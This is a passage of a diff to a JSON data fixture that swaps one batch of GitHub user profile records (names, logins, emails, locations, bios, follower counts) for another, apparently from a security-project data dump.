"https://avatars.githubusercontent.com/u/90183084?v=4", - "company": "TIAC", - "location": "Novi Sad, Serbia", + "avatar_url": "https://avatars.githubusercontent.com/u/2538958?v=4", + "company": "Mittwald CM Service (@mittwald)", + "location": "Rahden, Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-09-06T08:43:19Z", - "updated_at": "2024-09-10T05:01:52Z", - "node_id": "MDQ6VXNlcjkwMTgzMDg0", - "bio": "", + "following_count": 37, + "followers_count": 187, + "public_gists_count": 4, + "public_repositories_count": 117, + "created_at": "2012-10-11T18:06:52Z", + "updated_at": "2024-09-19T11:10:40Z", + "node_id": "MDQ6VXNlcjI1Mzg5NTg=", + "bio": "Chief Tech Evangelist at @mittwald and open source enthusiast", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2991, + "pk": 8364, "fields": { - "nest_created_at": "2024-09-12T02:40:37.068Z", - "nest_updated_at": "2024-09-12T02:40:37.068Z", - "name": "Claudio Consolmagno", - "login": "ClaudioConsolmagno", + "nest_created_at": "2024-09-22T10:35:41.790Z", + "nest_updated_at": "2024-09-22T19:49:06.283Z", + "name": "Hannes", + "login": "shiz0", + "email": "info@h2-it.de", + "avatar_url": "https://avatars.githubusercontent.com/u/25741772?v=4", + "company": "", + "location": "Freiburg/Germany", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2017-02-13T11:13:27Z", + "updated_at": "2024-05-02T11:06:07Z", + "node_id": "MDQ6VXNlcjI1NzQxNzcy", + "bio": "[System/Network/Serveradmin]\r\n[Windows/Linux/Docker/VMware]\r\n[MCSA/MCSE]", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8365, + "fields": { + "nest_created_at": "2024-09-22T10:35:42.101Z", + "nest_updated_at": "2024-09-22T19:49:06.595Z", + "name": "Florian Ockhuysen", + "login": "florianock", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33358623?v=4", - "company": "@getmayday ", - "location": "London", + "avatar_url": "https://avatars.githubusercontent.com/u/13467977?v=4", + "company": "Zócalo ICT", + "location": "Netherlands", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 3, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2017-11-03T19:30:39Z", - "updated_at": "2024-05-19T12:54:31Z", - "node_id": "MDQ6VXNlcjMzMzU4NjIz", + "public_repositories_count": 33, + "created_at": "2015-07-23T12:35:33Z", + "updated_at": "2024-04-10T07:14:57Z", + "node_id": "MDQ6VXNlcjEzNDY3OTc3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435028,24 +695052,24 @@ }, { "model": "github.user", - "pk": 2992, + "pk": 8366, "fields": { - "nest_created_at": "2024-09-12T02:40:38.396Z", - "nest_updated_at": "2024-09-12T02:40:38.396Z", - "name": "Guillaume Lederrey", - "login": "gehel", - "email": "guillaume.lederrey@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1415765?v=4", + "nest_created_at": "2024-09-22T10:35:42.742Z", + "nest_updated_at": "2024-09-22T19:49:07.283Z", + "name": "Allan Mørk Christensen", + "login": "allanmc", + "email": "allanmc@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/127648?v=4", "company": "", - "location": "Lausanne, Switzerland", + "location": "Copenhagen, Denmark, Europe", "collaborators_count": 0, - "following_count": 12, - "followers_count": 35, - "public_gists_count": 12, - "public_repositories_count": 109, - "created_at": "2012-02-07T11:39:09Z", - "updated_at": "2024-08-20T18:25:37Z", - "node_id": "MDQ6VXNlcjE0MTU3NjU=", + "following_count": 10, + "followers_count": 12, + "public_gists_count": 2, + "public_repositories_count": 17, + "created_at": "2009-09-16T08:52:42Z", + "updated_at": "2024-09-16T07:35:47Z", + "node_id": "MDQ6VXNlcjEyNzY0OA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435053,24 +695077,24 @@ }, { "model": "github.user", - "pk": 2993, + "pk": 8367, "fields": { - "nest_created_at": "2024-09-12T02:40:39.226Z", - "nest_updated_at": "2024-09-18T19:12:52.100Z", - "name": "", - "login": "bsellier", + "nest_created_at": "2024-09-22T10:35:43.055Z", + "nest_updated_at": "2024-09-22T19:49:07.628Z", + "name": "Adrian Chuck", + "login": "combine-space", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/100307206?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48205714?v=4", + "company": "@4teamwork ", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2022-02-23T17:26:56Z", - "updated_at": "2024-09-16T15:41:47Z", - "node_id": "U_kgDOBfqRBg", + "public_repositories_count": 1, + "created_at": "2019-03-04T10:14:11Z", + "updated_at": "2024-09-04T10:11:34Z", + "node_id": "MDQ6VXNlcjQ4MjA1NzE0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435078,49 +695102,49 @@ }, { "model": "github.user", - "pk": 2994, + "pk": 8368, "fields": { - "nest_created_at": "2024-09-12T02:40:40.060Z", - "nest_updated_at": "2024-09-12T02:40:40.060Z", - "name": "", - "login": "sjlx12345", + "nest_created_at": "2024-09-22T10:38:32.471Z", + "nest_updated_at": "2024-09-22T20:23:46.794Z", + "name": "Jason White", + "login": "misfir3", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60878158?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5103241?v=4", + "company": "Uhhh ... @github ", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 0, + "following_count": 0, + "followers_count": 31, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2020-02-10T10:56:52Z", - "updated_at": "2024-04-17T09:37:45Z", - "node_id": "MDQ6VXNlcjYwODc4MTU4", - "bio": "", + "public_repositories_count": 16, + "created_at": "2013-07-27T16:23:19Z", + "updated_at": "2024-06-05T21:23:06Z", + "node_id": "MDQ6VXNlcjUxMDMyNDE=", + "bio": "Product Security human @GitHubSecurity. Helping secure software built to help software devs build software securely ... if a woodchuck could chuck wood.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "misfir3" } }, { "model": "github.user", - "pk": 2995, + "pk": 8369, "fields": { - "nest_created_at": "2024-09-12T02:40:40.875Z", - "nest_updated_at": "2024-09-12T02:40:40.875Z", - "name": "", - "login": "javanegmond", + "nest_created_at": "2024-09-22T10:38:34.098Z", + "nest_updated_at": "2024-09-22T20:23:48.444Z", + "name": "Benedikt Stuhrmann", + "login": "BenediktStuhrmann", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7011119?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/22676519?v=4", "company": "", - "location": "", + "location": "Germany", "collaborators_count": 0, "following_count": 2, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2014-03-20T13:05:37Z", - "updated_at": "2024-06-27T14:27:47Z", - "node_id": "MDQ6VXNlcjcwMTExMTk=", + "public_repositories_count": 0, + "created_at": "2016-10-07T08:20:46Z", + "updated_at": "2024-03-09T10:37:42Z", + "node_id": "MDQ6VXNlcjIyNjc2NTE5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435128,74 +695152,99 @@ }, { "model": "github.user", - "pk": 2996, + "pk": 8370, "fields": { - "nest_created_at": "2024-09-12T02:41:13.040Z", - "nest_updated_at": "2024-09-18T19:13:14.418Z", - "name": "Secure Decisions", - "login": "secdec", + "nest_created_at": "2024-09-22T10:38:34.440Z", + "nest_updated_at": "2024-09-22T20:23:48.791Z", + "name": "philstein", + "login": "PhilippeSteinbach", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32463091?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/16945319?v=4", "company": "", - "location": "Northport, NY", + "location": "Cologne, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 15, + "following_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2017-10-02T17:06:23Z", - "updated_at": "2017-10-02T17:16:44Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjMyNDYzMDkx", - "bio": "Secure Decisions is a cybersecurity focused division of Applied Visions, Inc.", + "public_repositories_count": 9, + "created_at": "2016-01-28T20:38:52Z", + "updated_at": "2024-09-16T07:51:41Z", + "node_id": "MDQ6VXNlcjE2OTQ1MzE5", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2997, + "pk": 8371, "fields": { - "nest_created_at": "2024-09-12T02:41:16.180Z", - "nest_updated_at": "2024-09-12T02:41:16.180Z", - "name": "Ozgur Alp", - "login": "ozguralp", + "nest_created_at": "2024-09-22T10:38:34.758Z", + "nest_updated_at": "2024-09-22T20:23:49.112Z", + "name": "Richard Lawson", + "login": "lawson89", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/28699863?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6586991?v=4", + "company": "CoLinx LLC", + "location": "Spartanburg, SC USA", "collaborators_count": 0, - "following_count": 1, - "followers_count": 156, + "following_count": 12, + "followers_count": 10, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-05-15T06:42:11Z", - "updated_at": "2024-09-11T11:22:52Z", - "node_id": "MDQ6VXNlcjI4Njk5ODYz", - "bio": "Twitter: @ozgur_bbh\r\n", + "public_repositories_count": 10, + "created_at": "2014-02-04T17:33:03Z", + "updated_at": "2024-09-05T14:04:10Z", + "node_id": "MDQ6VXNlcjY1ODY5OTE=", + "bio": "Java/Django/Python/Lua enthusiast. Java/Python/AWS backend dev working in the logistics industry", "is_hireable": false, - "twitter_username": "ozgur_bbh" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2998, + "pk": 8372, "fields": { - "nest_created_at": "2024-09-12T02:41:17.008Z", - "nest_updated_at": "2024-09-12T02:41:17.008Z", - "name": "", - "login": "shrirai", + "nest_created_at": "2024-09-22T10:38:35.080Z", + "nest_updated_at": "2024-09-22T20:23:49.434Z", + "name": "maxge", + "login": "MaxGeldner", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65364072?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22854757?v=4", + "company": "Digital Building Industries", + "location": "Esslingen, Germany", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-05-14T18:18:35Z", - "updated_at": "2020-05-14T18:20:12Z", - "node_id": "MDQ6VXNlcjY1MzY0MDcy", + "public_repositories_count": 10, + "created_at": "2016-10-15T12:17:08Z", + "updated_at": "2024-08-13T14:10:17Z", + "node_id": "MDQ6VXNlcjIyODU0NzU3", + "bio": "Software developer from south Germany. Web development with Vue and React.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8373, + "fields": { + "nest_created_at": "2024-09-22T10:38:35.705Z", + "nest_updated_at": "2024-09-22T20:23:50.061Z", + "name": "thebluedirt", + "login": "dcowden", + "email": "dave.cowden@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1297923?v=4", + "company": "Parametric Products LLC", + "location": "United States", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 36, + "public_gists_count": 0, + "public_repositories_count": 35, + "created_at": "2012-01-01T22:47:25Z", + "updated_at": "2024-09-14T23:26:15Z", + "node_id": "MDQ6VXNlcjEyOTc5MjM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435203,24 +695252,24 @@ }, { "model": "github.user", - "pk": 2999, + "pk": 8374, "fields": { - "nest_created_at": "2024-09-12T02:41:17.844Z", - "nest_updated_at": "2024-09-13T05:02:26.573Z", - "name": "", - "login": "bluekaka", + "nest_created_at": "2024-09-22T10:38:36.016Z", + "nest_updated_at": "2024-09-22T20:23:50.371Z", + "name": "Matthias Grundmann", + "login": "matthias-g", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6761110?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1591161?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2014-02-23T05:26:10Z", - "updated_at": "2024-05-05T10:32:38Z", - "node_id": "MDQ6VXNlcjY3NjExMTA=", + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 33, + "created_at": "2012-03-30T17:08:58Z", + "updated_at": "2024-06-21T06:27:36Z", + "node_id": "MDQ6VXNlcjE1OTExNjE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435228,24 +695277,24 @@ }, { "model": "github.user", - "pk": 3000, + "pk": 8375, "fields": { - "nest_created_at": "2024-09-12T02:41:20.006Z", - "nest_updated_at": "2024-09-12T02:41:50.205Z", - "name": "", - "login": "matthewD-AVI", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/35819157?v=4", + "nest_created_at": "2024-09-22T10:38:36.343Z", + "nest_updated_at": "2024-09-22T20:23:50.711Z", + "name": "Elie De Brauwer", + "login": "ElieDeBrauwer", + "email": "eliedebrauwer@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/124795?v=4", "company": "", - "location": "", + "location": "Belgium", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-01-25T21:39:01Z", - "updated_at": "2024-04-01T17:21:08Z", - "node_id": "MDQ6VXNlcjM1ODE5MTU3", + "followers_count": 7, + "public_gists_count": 2, + "public_repositories_count": 16, + "created_at": "2009-09-09T06:43:19Z", + "updated_at": "2024-08-18T08:41:49Z", + "node_id": "MDQ6VXNlcjEyNDc5NQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435253,24 +695302,24 @@ }, { "model": "github.user", - "pk": 3001, + "pk": 8376, "fields": { - "nest_created_at": "2024-09-12T02:41:28.345Z", - "nest_updated_at": "2024-09-18T19:13:12.588Z", - "name": "Manuel Walder", - "login": "manuelWalder", + "nest_created_at": "2024-09-22T10:38:36.653Z", + "nest_updated_at": "2024-09-22T20:23:51.022Z", + "name": "Lee", + "login": "act-ive", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/93798572?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8407026?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-11-05T22:19:05Z", - "updated_at": "2024-08-08T14:37:21Z", - "node_id": "U_kgDOBZdArA", + "public_repositories_count": 2, + "created_at": "2014-08-10T07:39:18Z", + "updated_at": "2022-01-17T05:25:42Z", + "node_id": "MDQ6VXNlcjg0MDcwMjY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435278,24 +695327,24 @@ }, { "model": "github.user", - "pk": 3002, + "pk": 8377, "fields": { - "nest_created_at": "2024-09-12T02:41:29.749Z", - "nest_updated_at": "2024-09-12T02:41:37.166Z", - "name": "Tyler Camp", - "login": "tylercamp", - "email": "tylermatthewcamp@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3388513?v=4", + "nest_created_at": "2024-09-22T10:38:36.968Z", + "nest_updated_at": "2024-09-22T20:23:51.327Z", + "name": "mario", + "login": "zupzup", + "email": "mario@zupzup.org", + "avatar_url": "https://avatars.githubusercontent.com/u/942652?v=4", "company": "", - "location": "", + "location": "Vienna, Austria", "collaborators_count": 0, - "following_count": 26, - "followers_count": 15, - "public_gists_count": 19, - "public_repositories_count": 42, - "created_at": "2013-01-26T07:12:02Z", - "updated_at": "2024-07-04T02:25:50Z", - "node_id": "MDQ6VXNlcjMzODg1MTM=", + "following_count": 0, + "followers_count": 297, + "public_gists_count": 46, + "public_repositories_count": 147, + "created_at": "2011-07-27T18:06:08Z", + "updated_at": "2024-08-28T21:33:52Z", + "node_id": "MDQ6VXNlcjk0MjY1Mg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435303,24 +695352,49 @@ }, { "model": "github.user", - "pk": 3003, + "pk": 8378, "fields": { - "nest_created_at": "2024-09-12T02:41:42.364Z", - "nest_updated_at": "2024-09-12T02:41:42.364Z", - "name": "", - "login": "rlgordey", + "nest_created_at": "2024-09-22T10:38:37.285Z", + "nest_updated_at": "2024-09-22T20:23:51.697Z", + "name": "Nicholas J. Parks", + "login": "nicholasparks", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/86806492?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9285387?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-07-01T21:42:15Z", - "updated_at": "2023-04-08T10:46:57Z", - "node_id": "MDQ6VXNlcjg2ODA2NDky", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2014-10-17T16:06:06Z", + "updated_at": "2024-01-04T17:41:03Z", + "node_id": "MDQ6VXNlcjkyODUzODc=", + "bio": "Yet another one of my GitHubs. Nothing to see here. It is obvious that my opinions are my own.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8379, + "fields": { + "nest_created_at": "2024-09-22T10:38:37.607Z", + "nest_updated_at": "2024-09-22T20:23:52.015Z", + "name": "", + "login": "thiswayman", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2112401?v=4", + "company": "@sonatype ", + "location": "Land of blooming flowers", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 9, + "created_at": "2012-08-07T20:48:39Z", + "updated_at": "2024-08-06T15:56:39Z", + "node_id": "MDQ6VXNlcjIxMTI0MDE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435328,24 +695402,24 @@ }, { "model": "github.user", - "pk": 3004, + "pk": 8380, "fields": { - "nest_created_at": "2024-09-12T02:42:01.448Z", - "nest_updated_at": "2024-09-18T19:01:35.622Z", - "name": "DedSec Inside", - "login": "DedSecInside", - "email": "thepsnarayanan@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/20391554?v=4", + "nest_created_at": "2024-09-22T10:38:37.915Z", + "nest_updated_at": "2024-09-22T20:23:52.323Z", + "name": "", + "login": "robiq", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/124636797?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 135, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2016-07-11T04:46:14Z", - "updated_at": "2024-09-17T11:31:42Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjIwMzkxNTU0", + "public_repositories_count": 0, + "created_at": "2023-02-06T22:47:32Z", + "updated_at": "2023-02-07T20:10:15Z", + "node_id": "U_kgDOB23OfQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435353,124 +695427,124 @@ }, { "model": "github.user", - "pk": 3005, + "pk": 8381, "fields": { - "nest_created_at": "2024-09-12T02:42:04.560Z", - "nest_updated_at": "2024-09-12T03:07:27.757Z", - "name": "PS Narayanan", - "login": "PSNAppz", - "email": "thepsnarayanan@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/4481429?v=4", - "company": "OpenG2P", - "location": "::1", + "nest_created_at": "2024-09-22T10:38:38.236Z", + "nest_updated_at": "2024-09-22T20:23:52.634Z", + "name": "Satoshi SAKAO", + "login": "ottijp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7289233?v=4", + "company": "", + "location": "Tokyo, Japan", "collaborators_count": 0, - "following_count": 51, - "followers_count": 204, - "public_gists_count": 11, - "public_repositories_count": 101, - "created_at": "2013-05-20T17:45:33Z", - "updated_at": "2024-09-09T03:53:16Z", - "node_id": "MDQ6VXNlcjQ0ODE0Mjk=", - "bio": "Python, Coffee then Go(lang) \r\n|\r\nFounder @DedSecInside ", - "is_hireable": true, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 9, + "public_repositories_count": 55, + "created_at": "2014-04-14T11:12:26Z", + "updated_at": "2024-09-08T07:53:40Z", + "node_id": "MDQ6VXNlcjcyODkyMzM=", + "bio": "Software engineer in Tokyo, Japan.", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3006, + "pk": 8382, "fields": { - "nest_created_at": "2024-09-12T02:42:04.952Z", - "nest_updated_at": "2024-09-12T02:42:04.952Z", - "name": "PAVAN KALYAN S", - "login": "pavankalyan767", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/124815665?v=4", + "nest_created_at": "2024-09-22T10:38:38.570Z", + "nest_updated_at": "2024-09-22T20:23:52.984Z", + "name": "ronanclancy", + "login": "rjclancy", + "email": "ronan.clancy@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/969492?v=4", "company": "", - "location": "", + "location": "sligo, Ireland", "collaborators_count": 0, - "following_count": 14, - "followers_count": 2, + "following_count": 6, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2023-02-08T18:34:02Z", - "updated_at": "2024-08-19T16:10:05Z", - "node_id": "U_kgDOB3CJMQ", - "bio": "backend developer(django/python),AI/ML enthusiast", - "is_hireable": true, + "public_repositories_count": 18, + "created_at": "2011-08-09T17:34:01Z", + "updated_at": "2024-08-17T11:31:31Z", + "node_id": "MDQ6VXNlcjk2OTQ5Mg==", + "bio": "I'm an enthusiastic Software developer always willing to learn and try something different. In my spare time I'm usually coding or watching Home and Away", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3007, + "pk": 8383, "fields": { - "nest_created_at": "2024-09-12T02:42:11.011Z", - "nest_updated_at": "2024-09-18T19:01:38.339Z", - "name": "Akeem King", - "login": "KingAkeem", + "nest_created_at": "2024-09-22T10:38:38.890Z", + "nest_updated_at": "2024-09-22T20:23:53.312Z", + "name": "Philippe Lafoucrière", + "login": "gravis", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13573860?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12752?v=4", + "company": "GitLab", + "location": "Québec, Canada", "collaborators_count": 0, - "following_count": 19, - "followers_count": 109, - "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2015-07-30T15:08:23Z", - "updated_at": "2024-09-03T00:21:52Z", - "node_id": "MDQ6VXNlcjEzNTczODYw", - "bio": "A relentless learner and builder at heart with an insatiable curiosity that fuels me to work towards innovative solutions.", - "is_hireable": false, + "following_count": 13, + "followers_count": 75, + "public_gists_count": 35, + "public_repositories_count": 86, + "created_at": "2008-06-05T20:59:42Z", + "updated_at": "2024-07-19T15:57:01Z", + "node_id": "MDQ6VXNlcjEyNzUy", + "bio": "Distinguished Engineer at GitLab", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3008, + "pk": 8384, "fields": { - "nest_created_at": "2024-09-12T02:42:13.475Z", - "nest_updated_at": "2024-09-12T02:42:13.475Z", - "name": "Biohazard", - "login": "biohazard2117", - "email": "uttu.college.id@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/76464364?v=4", - "company": "NIT Raipur", + "nest_created_at": "2024-09-22T10:38:39.204Z", + "nest_updated_at": "2024-09-22T20:23:53.649Z", + "name": "", + "login": "avivmu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19804341?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 7, + "following_count": 0, "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 44, - "created_at": "2020-12-22T04:42:04Z", - "updated_at": "2024-09-11T16:53:54Z", - "node_id": "MDQ6VXNlcjc2NDY0MzY0", + "public_gists_count": 1, + "public_repositories_count": 18, + "created_at": "2016-06-07T17:56:35Z", + "updated_at": "2024-07-29T08:05:17Z", + "node_id": "MDQ6VXNlcjE5ODA0MzQx", "bio": "", - "is_hireable": true, - "twitter_username": "Utkarsh34063958" + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 3009, + "pk": 8385, "fields": { - "nest_created_at": "2024-09-12T02:42:19.726Z", - "nest_updated_at": "2024-09-12T02:42:19.726Z", - "name": "", - "login": "AnonymousRonin", + "nest_created_at": "2024-09-22T10:38:39.521Z", + "nest_updated_at": "2024-09-22T20:23:53.975Z", + "name": "Ruben van Vreeland", + "login": "RubieV", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/131200690?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8270394?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 0, - "created_at": "2023-04-18T19:14:20Z", - "updated_at": "2024-07-09T17:15:24Z", - "node_id": "U_kgDOB9H2sg", + "following_count": 28, + "followers_count": 12, + "public_gists_count": 5, + "public_repositories_count": 37, + "created_at": "2014-07-25T19:29:55Z", + "updated_at": "2024-09-10T14:05:31Z", + "node_id": "MDQ6VXNlcjgyNzAzOTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435478,49 +695552,49 @@ }, { "model": "github.user", - "pk": 3010, + "pk": 8386, "fields": { - "nest_created_at": "2024-09-12T03:07:29.007Z", - "nest_updated_at": "2024-09-18T19:01:57.399Z", - "name": "NO MONKEY", - "login": "NO-MONKEY", + "nest_created_at": "2024-09-22T10:38:39.832Z", + "nest_updated_at": "2024-09-22T20:23:54.280Z", + "name": "Nicholas", + "login": "nparks-owasp", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65667199?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/24616081?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2020-05-20T14:09:59Z", - "updated_at": "2020-11-02T14:10:52Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjY1NjY3MTk5", - "bio": "", + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 4, + "created_at": "2016-12-17T01:37:17Z", + "updated_at": "2018-09-01T19:08:48Z", + "node_id": "MDQ6VXNlcjI0NjE2MDgx", + "bio": "Profile just for OWASP related work. See other profiles for other work. ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3011, + "pk": 8387, "fields": { - "nest_created_at": "2024-09-12T03:07:35.696Z", - "nest_updated_at": "2024-09-13T05:14:00.291Z", - "name": "", - "login": "Mattew16", + "nest_created_at": "2024-09-22T10:38:40.474Z", + "nest_updated_at": "2024-09-22T20:23:54.944Z", + "name": "Johannes Egger", + "login": "johannesegger", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1334976?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/237707?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2012-01-16T21:18:17Z", - "updated_at": "2024-05-22T08:20:53Z", - "node_id": "MDQ6VXNlcjEzMzQ5NzY=", + "following_count": 0, + "followers_count": 26, + "public_gists_count": 10, + "public_repositories_count": 76, + "created_at": "2010-04-06T05:53:59Z", + "updated_at": "2024-09-21T18:03:43Z", + "node_id": "MDQ6VXNlcjIzNzcwNw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435528,49 +695602,49 @@ }, { "model": "github.user", - "pk": 3012, + "pk": 8388, "fields": { - "nest_created_at": "2024-09-12T03:07:36.625Z", - "nest_updated_at": "2024-09-12T03:07:36.625Z", - "name": "gbuday", - "login": "GergelyBuday", + "nest_created_at": "2024-09-22T10:38:40.784Z", + "nest_updated_at": "2024-09-22T20:23:55.260Z", + "name": "Erhun Baycelik", + "login": "muzir", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3908490?v=4", - "company": "University of Sheffield", - "location": "Sheffield", + "avatar_url": "https://avatars.githubusercontent.com/u/1410256?v=4", + "company": "@GetMoss", + "location": "Estonia", "collaborators_count": 0, - "following_count": 4, - "followers_count": 1, - "public_gists_count": 3, - "public_repositories_count": 9, - "created_at": "2013-03-19T10:17:26Z", - "updated_at": "2024-09-10T07:44:18Z", - "node_id": "MDQ6VXNlcjM5MDg0OTA=", + "following_count": 32, + "followers_count": 41, + "public_gists_count": 26, + "public_repositories_count": 12, + "created_at": "2012-02-05T16:28:10Z", + "updated_at": "2024-09-18T20:17:07Z", + "node_id": "MDQ6VXNlcjE0MTAyNTY=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3013, + "pk": 8389, "fields": { - "nest_created_at": "2024-09-12T03:08:15.232Z", - "nest_updated_at": "2024-09-12T03:08:15.232Z", - "name": "", - "login": "rafaabc", + "nest_created_at": "2024-09-22T10:38:41.096Z", + "nest_updated_at": "2024-09-22T20:23:55.603Z", + "name": "G H JWhite Test Account foo", + "login": "gh-jwhite", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42503318?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/45404692?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 14, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 23, - "created_at": "2018-08-18T23:31:37Z", - "updated_at": "2024-04-15T16:03:18Z", - "node_id": "MDQ6VXNlcjQyNTAzMzE4", + "public_repositories_count": 6, + "created_at": "2018-11-27T20:14:09Z", + "updated_at": "2024-08-26T11:53:02Z", + "node_id": "MDQ6VXNlcjQ1NDA0Njky", "bio": "", "is_hireable": false, "twitter_username": "" @@ -435578,49 